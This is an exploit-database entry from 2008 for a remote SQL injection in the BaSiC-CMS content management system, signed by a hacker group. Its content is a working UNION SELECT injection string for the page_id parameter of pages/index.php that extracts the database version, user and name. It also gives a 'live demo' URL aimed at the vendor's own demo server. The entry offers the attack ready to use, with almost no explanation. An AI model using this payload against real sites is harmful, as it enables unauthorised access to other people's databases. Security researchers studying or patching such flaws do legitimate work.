BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability

2008-06-17T00:00:00
ID 1337DAY-ID-3200
Type zdt
Reporter Mr.SQL
Modified 2008-06-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability
==========================================================



#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## BaSiC-CMS ( index.php r )
##
#########################################################################
########################
########################
##
## Script : BaSiC-CMS
##
## site   : www.Basic-CMS.de
##
########################
########################
##
##     -(:: SQL ::)-
##
##    www.site.com/pages/
##          index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
##
##  -(:: L!VE DEMO ::)-
##
##    http://demo.basic-cms.de/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
##
#######################
#######################

#######################################################################################################
#######################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
 :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
#######################################################################################################
#######################################################################################################



#  0day.today [2018-04-13]  #